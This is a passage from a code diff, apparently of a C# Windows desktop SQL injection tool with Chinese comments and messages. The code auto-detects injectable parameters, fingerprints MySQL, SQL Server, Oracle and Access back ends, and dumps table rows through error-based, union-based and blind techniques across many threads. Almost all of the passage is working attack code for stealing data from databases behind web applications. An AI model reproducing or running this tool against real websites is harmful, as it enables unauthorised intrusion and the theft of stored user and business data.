+ int start = 1;
+ //每次获取长度,err方式有长度限制
+ int count = 64 - 6;
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!");
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String datas_value_column = MySQL5.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()).Replace("{len}", count.ToString());
+ String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_column);
+ result += getOneDataByUnionOrError(c_datas_value_payload);
+ start += count;
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(result);
+ }
+ else
+ {
+ lvi.SubItems.Add(result);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + (gp.limit + 1) + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+
+ }
+
+ ///
+ /// 获取数据SQLServer,error方式,这个长度有限,需要判断是否大于错误消息的长度限制是64个
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByErrorBySQLServer(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String result = getOneDataByUnionOrError(MSSQL.getErrorDataValue(gp.dbname, gp.table, gp.limit, gp.columns));
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+
+ }
+
+ ///
+ /// 获取数据oracle,error方式,这个长度有限,需要判断是否大于错误消息的长度限制是256个
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByErrorByOracle(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String datas_len_payload = Oracle.getErrorDataLen(gp.columns, gp.dbname, gp.table, gp.limit.ToString());
+ String result_length = getOneHexDataByUnionOrError(Oracle.error_value.Replace("{data}", datas_len_payload));
+
+ int sumlen = Tools.convertToInt(result_length);
+ String result = "";
+ int start = 1;
+ //每次获取长度,err方式有长度限制
+ int count = 205;
+ if (count < 1)
+ {
+
+ this.Invoke(new StringDelegate(log), "报告大侠,选择的列太多了,无法获取数据!");
+ return;
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "个hex字符!");
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String tmp_data_payload = Oracle.getDataValue(gp.columns, gp.dbname, gp.table, gp.limit.ToString());
+ String err_tmp_data_payload = Oracle.substr_error_value.Replace("{data}", tmp_data_payload).Replace("{start}", start.ToString()).Replace("{len}", count.ToString());
+ result += getOneHexNoUnHexDataByUnionOrError(err_tmp_data_payload);
+ start += count;
+ }
+
+ result = Tools.unHex(result, config.db_encoding);
+
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ /*
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+ foreach (String column in gp.columns)
+ {
+ //获取数据长度
+
+ String datas_payload_columns = Tools.creatMySQLColumnStr(column);
+ String datas_payload_length = MySQL5.char_length.Replace("{data}", "hex(" + datas_payload_columns) + ") from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1";
+
+ String d_l_e = Tools.creatMySQLColumnStr("(" + datas_payload_length + ")");
+ String datas_payload_length_error = MySQL5.error_value.Replace("{data}", d_l_e);
+
+ String result_length = getOneDataByUnionOrError(datas_payload_length_error);
+
+ int sumlen = Tools.convertToInt(result_length);
+ String datas_value_payload = "(select " + Tools.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")";
+ String result = "";
+ int start = 1;
+ //每次获取长度,err方式有长度限制
+ int count = 64 - 6;
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!");
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String datas_value_column = Tools.creatMySQLColumnStr(MySQL5.substr_value.Replace("{data}", MySQL5.hex_value.Replace("{data}", datas_value_payload)).Replace("{start}", start.ToString()).Replace("{len}", count.ToString()));
+ String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_column);
+ result += getOneDataByUnionOrError(c_datas_value_payload);
+ start += count;
+ }
+ //查找格式^^^col$$$col^^^
+ result = Tools.unHex(result, config.db_encoding);
+ Match m = Regex.Match(result, "(?<=(\\^\\^\\!))[.\\s\\S]*?(?=(\\!\\^\\^))");
+ if (m.Success)
+ {
+ result = m.Value;
+ }
+
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(result);
+ }
+ else
+ {
+ lvi.SubItems.Add(result);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }*/
+
+ }
+
+
+
+ public void getDatasByBool(DBType dbtype, List columns, int start, int dataCount)
+ {
+ bool isMax = false;
+ switch (dbtype)
+ {
+
+ case DBType.Access:
+ isMax = findKeyInBody(Access.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), dataCount);
+ if (isMax)
+ {
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByBoolByAccess), gd);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("没有这么多行数据,改小点,2B!");
+ }
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ isMax = findKeyInBody(MySQL5.getBoolCountBySleep(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), config.maxTime), (start + dataCount));
+ }
+ else
+ {
+ isMax = findKeyInBody(MySQL5.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), (start + dataCount));
+ }
+
+ if (isMax)
+ {
+ for (int i = 0; i < dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByBoolByMySQL), gd);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("没有这么多行数据,改小点,2B!");
+ }
+
+ break;
+ case DBType.SQLServer:
+ isMax = findKeyInBody(MSSQL.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), dataCount);
+ if (isMax)
+ {
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByBoolBySQLServer), gd);
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有这么多行数据,改小点,2B!");
+ }
+
+ break;
+ case DBType.Oracle:
+ isMax = findKeyInBody(Oracle.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), dataCount);
+ if (isMax)
+ {
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByBoolByOracle), gd);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("没有这么多行数据,改小点,2B!");
+ }
+ break;
+ }
+
+ }
+
+
+ public void getDatasByError(DBType dbtype, List columns, int start, int dataCount)
+ {
+ List data_list = new List();
+ String datas_count_payload = "";
+ String result = "";
+ int datas_count = 0;
+ switch (dbtype)
+ {
+
+ case DBType.Access:
+ MessageBox.Show(ErrorMessage.access_no_error_inject_info);
+ break;
+ case DBType.MySQL4:
+ MessageBox.Show(ErrorMessage.mysql4_no_error_inject_info);
+ break;
+ case DBType.MySQL5:
+
+ data_list.Add(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table));
+ datas_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", datas_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+
+ for (int i = 0; i < dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByErrorByMySQL), gd);
+ }
+ break;
+ case DBType.SQLServer:
+ result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)));
+ //HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //注意下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ //按照一行的一列一列开始获取
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByErrorBySQLServer), gd);
+ }
+ break;
+ case DBType.Oracle:
+ result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.union_data_count, this.curren_db, this.curren_table, ""));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //注意下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ //按照一行的一列一列开始获取
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByErrorByOracle), gd);
+ }
+ break;
+ }
+
+ }
+
+
+ public void getDatasByUnion(DBType dbtype, List columns, int start, int dataCount)
+ {
+ List data_list = new List();
+ String datas_count_payload = "";
+ String result = "";
+
+ int datas_count = 0;
+ switch (dbtype)
+ {
+
+ case DBType.Access:
+
+ datas_count_payload = Access.getUnionDataValue(config.columnsCount, config.showColumn, 1, Access.data_count.Replace("{table}", this.curren_table)).Replace("{table}", this.curren_table);
+ result = getOneDataByUnionOrError(datas_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByUnionByAccess), gd);
+ }
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ data_list.Add(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table));
+ datas_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", datas_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+
+ for (int i = 0; i < dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByUnionByMySQL), gd);
+ }
+ break;
+ case DBType.SQLServer:
+
+ datas_count_payload = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.data_count, this.curren_db, this.curren_table, "");
+ result = getOneDataByUnionOrError(datas_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByUnionBySQLServer), gd);
+ }
+ break;
+ case DBType.Oracle:
+ datas_count_payload = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.union_data_count, this.curren_db, this.curren_table, "");
+ result = getOneDataByUnionOrError(datas_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByUnionByOracle), gd);
+ }
+ break;
+ }
+
+ }
+
+ public void getData(Object ocolumns_list)
+ {
+
+ int count = Tools.convertToInt(this.data_dbs_txt_count.Text);
+ int start = Tools.convertToInt(this.data_dbs_txt_start.Text);
+ if (count <= 0 || start < 0 || start + count <= 0)
+ {
+ MessageBox.Show("大哥,您在忽悠我吗,要获取多少行数据啊?");
+ return;
+ }
+ //多线程
+ List col_list = (List)ocolumns_list;
+
+ if (col_list.Count > 0)
+ {
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ getDatasByBool(config.dbType, col_list, start, count);
+ break;
+
+ case InjectType.Union:
+
+ getDatasByUnion(config.dbType, col_list, start, count);
+ break;
+ case InjectType.Error:
+ getDatasByError(config.dbType, col_list, start, count);
+ break;
+ case InjectType.Sleep:
+ getDatasByUnion(config.dbType, col_list, start, count);
+ break;
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("请在左边点击选择列!");
+ }
+ }
+
+
+ private void log_lvw_httpLog_MouseClick(object sender, MouseEventArgs e)
+ {
+ if (this.log_lvw_httpLog.SelectedItems.Count > 0)
+ {
+ try
+ {
+ String tag = this.log_lvw_httpLog.SelectedItems[0].Tag.ToString();
+ this.log_txt_request.Text = FileTool.readFileToString(Tools.httpLogPath + tag + "-request.txt");
+ String response = FileTool.readFileToString(Tools.httpLogPath + tag + "-response.txt");
+ if (!String.IsNullOrEmpty(response))
+ {
+ int index = response.IndexOf("\r\n\r\n");
+
+ if (index != -1)
+ {
+ this.log_txt_response.Text = response;
+ this.webBro_log.ScriptErrorsSuppressed = true;
+ this.webBro_log.DocumentText = response.Substring(index, response.Length - index);
+ }
+
+
+ }
+ else
+ {
+ MessageBox.Show("没有读到详细HTTP日志,可能上一次清除记录时已清除!");
+ }
+ }
+ catch (Exception ee)
+ {
+ Tools.SysLog("查看详细HTTP日志,发生异常----" + ee.Message);
+ }
+ }
+ }
+
+ private void data_cms_clearLog_Click(object sender, EventArgs e)
+ {
+ Thread t = new Thread(Tools.delHTTPLog);
+ t.Start();
+ this.log_lvw_httpLog.Items.Clear();
+
+ }
+ public int autoinject = 0;
+ public Thread injectThread = null;
+ private void btn_autoInject_Click(object sender, EventArgs e)
+ {
+
+ if (autoinject == 0)
+ {
+ if (config.request.IndexOf("#inject#") != -1)
+ {
+ MessageBox.Show("已经标记好注入,无需识别!");
+ return;
+ }
+ autoinject = 1;
+ injectThread = new Thread(inject);
+ injectThread.Name = "AutoCheckInjectThread-";
+ injectThread.Start();
+ this.btn_autoInject.Text = "停止";
+
+ }
+ else
+ {
+ if (injectThread != null)
+ {
+ injectThread.Abort();
+ }
+ this.btn_autoInject.Text = "自动识别";
+ autoinject = 0;
+ }
+ }
+
+ public void inject()
+ {
+ try
+ {
+ selectInjectType(0);
+ selectDB("UnKnow");
+ //判断提交数据内型
+ String data = "";
+ if (config.request.StartsWith("GET"))
+ {
+ int start = config.request.IndexOf('?');
+ if (start == -1)
+ {
+ MessageBox.Show("没有发现参数!");
+ return;
+ }
+ int end = config.request.IndexOf(' ', start);
+ if (end > start)
+ {
+
+ data = config.request.Substring(start + 1, end - start - 1);
+ }
+ else
+ {
+ MessageBox.Show("无法获得GET请求的参数!");
+ }
+
+ }
+ else
+ {
+ //POST
+ data = Regex.Split(config.request, "\r\n\r\n")[1];
+
+ }
+
+ String strparam = data.Replace("", "").Replace("", "").Replace("#inject#", "");
+
+ //获取原始的页面信息
+ String request = config.request.Replace(data, strparam);
+ ServerInfo oserver = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, "获取原始页面", request, config.timeOut, HTTP.AutoGetEncoding, config.is_foward_302, config.redirectDoGet);
+
+
+ if (!HTTP.AutoGetEncoding.Equals(config.encoding)){
+ //自定义
+ if (!config.encoding.Equals(oserver.encoding))
+ {
+ DialogResult dr = MessageBox.Show("自动识别发现网页编码为“" + oserver.encoding + ",而你选择的编码是“" + config.encoding + "””,是否采用自定义编码,不选择将自动识别!", "提示信息", MessageBoxButtons.YesNo);
+ if (DialogResult.No.Equals(dr))
+ {
+ this.cbox_basic_encoding.Text = HTTP.AutoGetEncoding;
+ }
+ }
+ }
+ else {
+ //自动识别
+ if (String.IsNullOrEmpty(oserver.encoding))
+ {
+ DialogResult dr = MessageBox.Show("自动识别未发现网页编码,是否人工选择一个编码,不选择将默认采用" + HTTP.DefaultEncoding + "编码?", "提示信息", MessageBoxButtons.YesNo);
+ if (DialogResult.Yes.Equals(dr))
+ {
+ this.btn_autoInject.Text = "自动识别";
+ autoinject = 0;
+ return;
+ }
+ }
+ else {
+ MessageBox.Show("自动识别网页编码为:“"+oserver.encoding+"”");
+ }
+ }
+
+
+ //拆分参数
+ String[] strparams = strparam.Split('&');
+ this.Invoke(new StringDelegate(log), "报告大侠,发现" + strparams.Length + "个参数,请稍候正在对每一个参数进行注入测试!");
+ foreach (String param in strparams)
+ {
+
+ String unionStartPayLoad = "";
+ if (String.IsNullOrEmpty(param))
+ {
+ continue;
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,正在对参数参数" + param + "进行盲注测试!");
+ String newParam = "";//标记注入
+ String payload_location = strparam.Replace(param, param + "#inject#");
+ String payload_request = request.Replace(strparam, payload_location);
+ String currentDB = "UnKnow";
+ //读取payload
+ List list = FileTool.readFileToList("config/injection/injection.txt");
+
+ //判断存在bool盲注
+ bool boolInject = false;
+ bool errorInject = false;
+ bool unionInject = false;
+
+ if (list != null && list.Count > 0)
+ {
+ foreach (String pal in list)
+ {
+ this.Invoke(new StringDelegate(log), "正在测试PayLoad:" + pal);
+ String[] pals = pal.Split(':');
+
+ ServerInfo falseServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[1], payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ decimal pfalse = Tools.getLike(oserver.body, falseServer.body);
+ if (pfalse > 99)
+ {
+ continue;
+ }
+ ServerInfo trueServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[0], payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ decimal ptrue = Tools.getLike(oserver.body, trueServer.body);
+ if (oserver.code != 404 && !InjectionTools.errer_code.Contains(oserver.code.ToString()) && !InjectionTools.errer_code.Contains(trueServer.code.ToString()) && !InjectionTools.errer_code.Contains(falseServer.code.ToString()) && trueServer.body.Length > 0 && falseServer.body.Length > 0)
+ {
+
+ //判断存在bool盲注
+ //根据状态码判断
+ if (oserver.code == trueServer.code && trueServer.code != falseServer.code)
+ {
+ //选择盲注配置
+ this.txt_inject_key.Text = oserver.code + "";
+ this.cbox_inject_type.SelectedIndex = Convert.ToInt32(KeyType.Code);
+ this.chk_inject_reverseKey.Checked = false;
+ boolInject = true;
+ this.Invoke(new StringDelegate(log), "根据状态码判断存在SQL注入!");
+ }
+
+ if (falseServer.body.Length < trueServer.body.Length)
+ {
+ if (ptrue == 100)
+ {
+
+ if (ptrue > pfalse)
+ {
+ //根据相似度判断
+ this.Invoke(new StringDelegate(log), "根据相似度判断存在SQL注入!固定长度,相似度--false|true1|true2--" + pfalse + "|" + ptrue + "%");
+ boolInject = true;
+ //判断关键字
+ checkTheKey(trueServer, falseServer, oserver);
+ }
+ }
+ else {
+
+ ServerInfo true1Server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[0].Replace("1%3d1", "2%3d2"), payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ decimal p = Tools.getLike(oserver.body, true1Server.body);
+ if (ptrue - pfalse >= 2 && Math.Abs(p - pfalse) >= 2)
+ {
+ //根据相似度判断
+ this.Invoke(new StringDelegate(log), "根据相似度判断存在SQL注入!动态长度,相似度--false|true1|true2--" + pfalse + "|" + ptrue + "|" + p + "%");
+ boolInject = true;
+ //判断关键字
+ checkTheKey(trueServer, falseServer, oserver);
+ }
+
+
+ }
+ }
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), "程序判断不存在SQL注入!");
+ }
+
+ if (boolInject)
+ {
+
+ this.Invoke(new StringDelegate(log), "存在" + pals[2] + "payload:" + pals[0]);
+ selectInjectType(1);
+ //识别数据库
+ List database_lsit = FileTool.readAllDic("config/database/");
+
+ foreach (String d in database_lsit)
+ {
+ if (!"UnKnow".Equals(currentDB))
+ {
+ break;
+ }
+ String db = d.Replace(".txt", "");
+ this.Invoke(new StringDelegate(log), "正在判断是否是" + db + "数据库");
+
+ List dbpayload_list = FileTool.readFileToList("config/database/" + d);
+ foreach (String cdpay in dbpayload_list)
+ {
+ ServerInfo dbServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[0].Replace("1=1", cdpay), payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ if (config.useCode && trueServer.code == dbServer.code)
+ {
+ this.Invoke(new StringDelegate(log), "程序判断数据库为" + db + "数据库");
+ currentDB = db;
+ selectDB(currentDB);
+ break;
+ }
+ else if (dbServer.length >= oserver.length && dbServer.code == oserver.code)
+ {
+ //根据关键字判断
+ if (dbServer.body.IndexOf(config.key) != -1)
+ {
+ this.Invoke(new StringDelegate(log), "程序判断数据库为" + db + "数据库");
+ currentDB = db;
+ selectDB(currentDB);
+ break;
+ }
+ }
+
+ }
+ }
+ //用于标记注入的新字符
+ newParam = strparam.Replace(param, param + "" + pals[0].Replace(" and 1=1", "#inject#") + "");
+ if (pals[0].StartsWith(" "))
+ {
+ unionStartPayLoad = "";
+ }
+ else
+ {
+ unionStartPayLoad = pals[0].Split(' ')[0];
+ }
+
+ if (!String.IsNullOrEmpty(currentDB))
+ {
+
+ selectDB(currentDB);
+ }
+ else
+ {
+ //通过错误显示判断
+ ServerInfo errorDBServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, "'test", payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ String basePath = "config/injection/error/";
+ List errorDBList = FileTool.readAllDic(basePath);
+ String cdb = "";
+ foreach (String ep in errorDBList)
+ {
+ if (!String.IsNullOrEmpty(cdb)) break;
+ List errorKeys = FileTool.readFileToList(basePath + ep);
+
+ foreach (String key in errorKeys)
+ {
+
+ bool find = Regex.IsMatch(errorDBServer.body, key, RegexOptions.IgnoreCase);
+ if (find)
+ {
+ currentDB = ep.Replace(".txt", "");
+ break;
+ }
+ }
+
+ }
+ if (!String.IsNullOrEmpty(currentDB))
+ {
+ selectDB(currentDB);
+ this.Invoke(new StringDelegate(log), "通过错误显示发现数据库为" + currentDB + "!");
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), "没有发现发现数据库类型,可能是其他数据库,请人工判断!");
+ }
+ }
+
+ break;
+ }
+ }
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), "报告大侠,没有读取到config/injection/injection.txt注入测试payload!");
+ }
+
+ //错误注入测试
+ this.Invoke(new StringDelegate(log), "报告大侠,盲注测试完成,正在进行错误显示注入测试!");
+
+ if (currentDB.Equals("Access"))
+ {
+
+ this.Invoke(new StringDelegate(log), "报告大侠,Access数据库不支持错误显示注入,已自动跳过!");
+ }
+ else
+ {
+ //读取payload
+ List error_list = FileTool.readFileToList("config/injection/error_injection.txt");
+ if (error_list != null && error_list.Count > 0)
+ {
+ foreach (String cpal in error_list)
+ {
+ String[] pals = cpal.Split(':');
+
+ ServerInfo errorServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[0], payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ if (errorServer.body.IndexOf(pals[1]) != -1)
+ {
+ this.Invoke(new StringDelegate(log), "发现" + pals[2]);
+ selectDB(pals[3]);
+ //标记注入
+ selectInjectType(2);
+ errorInject = true;
+ newParam = strparam.Replace(param, param + pals[4]);
+ this.Invoke(new StringDelegate(log), "自动标记错误显示注入完成!");
+ break;
+ }
+
+ }
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), "没有读取到错误显示注入测试payload!");
+ }
+
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,错误显示测试完成,正在进行Union注入测试!");
+ //union注入
+
+ //最大100列
+ String payload = "";
+
+ if ("SQLServer".Equals(currentDB))
+ {
+ payload = unionStartPayLoad + "{payload};--";
+
+ }
+ else if ("MySQL".Equals(currentDB))
+ {
+ payload = unionStartPayLoad + "{payload}#";
+ }
+ else if ("Access".Equals(currentDB))
+ {
+ //处理%16不能被URL
+ payload = unionStartPayLoad + "{payload}";
+ }
+ else
+ {
+ payload = unionStartPayLoad + "{payload}-- ";
+
+ }
+ //判断总列数
+ Boolean isFind = false;
+ for (int i = 1; i <= config.maxClolumns; i++)
+ {
+ if (isFind)
+ {
+ break;
+ }
+ int basestr = 1111111;
+
+ String unionPayload = payload.Replace("{payload}", Comm.unionColumnCountTest(i, basestr));
+
+ if ("Oracle".Equals(currentDB))
+ {
+ unionPayload = payload.Replace("{payload}", Comm.unionColumnCountTestByOracle(i, "null"));
+ }
+ if ("Access".Equals(currentDB))
+ {
